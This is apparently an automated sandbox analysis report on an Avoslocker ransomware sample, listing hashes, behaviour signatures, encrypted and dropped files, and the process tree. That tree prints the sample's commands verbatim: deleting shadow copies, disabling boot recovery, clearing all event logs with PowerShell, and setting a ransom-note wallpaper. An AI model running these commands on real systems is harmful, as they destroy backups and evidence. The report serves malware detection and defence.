Analysis
-
max time kernel
94s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
15-12-2024 00:10
Static task
static1
Behavioral task
behavioral1
Sample
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
Resource
win10v2004-20241007-en
General
-
Target
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
-
Size
807KB
-
MD5
e27b5291c8fb2dfdeb7f16bb6851df5e
-
SHA1
40207f83b601cd60905c1f807ac0889c80dfe33f
-
SHA256
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
-
SHA512
2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a
-
SSDEEP
12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYAG:u4s+oT+NXBLi0rjFXvyHBlbmCZa8
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1368 bcdedit.exe 3056 bcdedit.exe -
Renames multiple (10398) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1641778529.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR36F.GIF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files (x86)\MSBuild\Microsoft\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLMAIL.FAE ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18197_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14882_.GIF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Media Player\it-IT\WMPDMCCore.dll.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\REMINDER.WAV ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files\7-Zip\Lang\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Origin.thmx ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_120.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL016.XML ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\DVD Maker\es-ES\OmdProject.dll.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\FlickLearningWizard.exe.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apothecary.eftx ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files\Internet Explorer\fr-FR\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\calendar.html ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\settings.css ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\GET_YOUR_FILES_BACK.txt ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe -
pid Process 2364 powershell.exe 6272 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1432 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 2364 powershell.exe 6272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe Token: SeIncreaseQuotaPrivilege 2220 WMIC.exe Token: SeSecurityPrivilege 2220 WMIC.exe Token: SeTakeOwnershipPrivilege 2220 WMIC.exe Token: SeLoadDriverPrivilege 2220 WMIC.exe Token: SeSystemProfilePrivilege 2220 WMIC.exe Token: SeSystemtimePrivilege 2220 WMIC.exe Token: SeProfSingleProcessPrivilege 2220 WMIC.exe Token: SeIncBasePriorityPrivilege 2220 WMIC.exe Token: SeCreatePagefilePrivilege 2220 WMIC.exe Token: SeBackupPrivilege 2220 WMIC.exe Token: SeRestorePrivilege 2220 WMIC.exe Token: SeShutdownPrivilege 2220 WMIC.exe Token: SeDebugPrivilege 2220 WMIC.exe Token: SeSystemEnvironmentPrivilege 2220 WMIC.exe Token: SeRemoteShutdownPrivilege 2220 WMIC.exe Token: SeUndockPrivilege 2220 WMIC.exe Token: SeManageVolumePrivilege 2220 WMIC.exe Token: 33 2220 WMIC.exe Token: 34 2220 WMIC.exe Token: 35 2220 WMIC.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeIncreaseQuotaPrivilege 2220 WMIC.exe Token: SeSecurityPrivilege 2220 WMIC.exe Token: SeTakeOwnershipPrivilege 2220 WMIC.exe Token: SeLoadDriverPrivilege 2220 WMIC.exe Token: SeSystemProfilePrivilege 2220 WMIC.exe Token: SeSystemtimePrivilege 2220 WMIC.exe Token: SeProfSingleProcessPrivilege 2220 WMIC.exe Token: SeIncBasePriorityPrivilege 2220 WMIC.exe Token: SeCreatePagefilePrivilege 2220 WMIC.exe Token: SeBackupPrivilege 2220 WMIC.exe Token: SeRestorePrivilege 2220 WMIC.exe Token: SeShutdownPrivilege 2220 WMIC.exe Token: SeDebugPrivilege 2220 WMIC.exe Token: SeSystemEnvironmentPrivilege 2220 WMIC.exe Token: SeRemoteShutdownPrivilege 2220 WMIC.exe Token: SeUndockPrivilege 2220 WMIC.exe Token: SeManageVolumePrivilege 2220 WMIC.exe Token: 33 2220 WMIC.exe Token: 34 2220 WMIC.exe Token: 35 2220 WMIC.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 6628 vssvc.exe Token: SeRestorePrivilege 6628 vssvc.exe Token: SeAuditPrivilege 6628 vssvc.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1232 wrote to memory of 2380 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 31 PID 1232 wrote to memory of 2380 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 31 PID 1232 wrote to memory of 2380 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 31 PID 1232 wrote to memory of 2380 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 31 PID 1232 wrote to memory of 2452 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 32 PID 1232 wrote to memory of 2452 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 32 PID 1232 wrote to memory of 2452 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 32 PID 1232 wrote to memory of 2452 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 32 PID 1232 wrote to memory of 2320 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 33 PID 1232 wrote to memory of 2320 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 33 PID 1232 wrote to memory of 2320 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 33 PID 1232 wrote to memory of 2320 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 33 PID 1232 wrote to memory of 2888 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 34 PID 1232 wrote to memory of 2888 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 34 PID 1232 wrote to memory of 2888 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 34 PID 1232 wrote to memory of 2888 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 34 PID 1232 wrote to memory of 1436 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 35 PID 1232 wrote to memory of 1436 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 35 PID 1232 wrote to memory of 1436 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 35 PID 1232 wrote to memory of 1436 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 35 PID 2380 wrote to memory of 2220 2380 cmd.exe 36 PID 2380 wrote to memory of 2220 2380 cmd.exe 36 PID 2380 wrote to memory of 2220 2380 cmd.exe 36 PID 1436 wrote to memory of 2364 1436 cmd.exe 37 PID 1436 wrote to memory of 2364 1436 cmd.exe 37 PID 1436 wrote to memory of 2364 1436 cmd.exe 37 PID 2320 wrote to memory of 1368 2320 cmd.exe 38 PID 2320 wrote to memory of 1368 2320 cmd.exe 38 PID 2320 wrote to memory of 1368 2320 cmd.exe 38 PID 2888 wrote to memory of 3056 2888 cmd.exe 39 PID 2888 wrote to memory of 3056 2888 cmd.exe 39 PID 2888 wrote to memory of 3056 2888 cmd.exe 39 PID 2452 wrote to memory of 1432 2452 cmd.exe 40 PID 2452 wrote to memory of 1432 2452 cmd.exe 40 PID 2452 wrote to memory of 1432 2452 cmd.exe 40 PID 1232 wrote to memory of 6272 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 45 PID 1232 wrote to memory of 6272 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 45 PID 1232 wrote to memory of 6272 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 45 PID 1232 wrote to memory of 6272 1232 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe 45 PID 6272 wrote to memory of 568 6272 powershell.exe 46 PID 6272 wrote to memory of 568 6272 powershell.exe 46 PID 6272 wrote to memory of 568 6272 powershell.exe 46 PID 6272 wrote to memory of 6900 6272 powershell.exe 47 PID 6272 wrote to memory of 6900 6272 powershell.exe 47 PID 6272 wrote to memory of 6900 6272 powershell.exe 47 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe"C:\Users\Admin\AppData\Local\Temp\ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1432
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1368
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3056
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6272 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1641778529.png /f3⤵
- Sets desktop wallpaper using registry
PID:568
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:6900
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6628
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d26f06f9ff6ae923f99f7e65baac2565
SHA11cdd3366268ae357338dddb5603c6905bd210dcf
SHA2561e60912c6ca0dcf3aaa8f8fdcd6e640c5c15d8136682416ec8bef6b553e372a8
SHA512f9efd7a6040dd6563006ad5592d8d93687460c1640df3e7c6eddd920f6f51fc9a0f361fa38a12f352182a8e54a09816714cf92c26f4d0ee5f8c89e767ac4a214
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848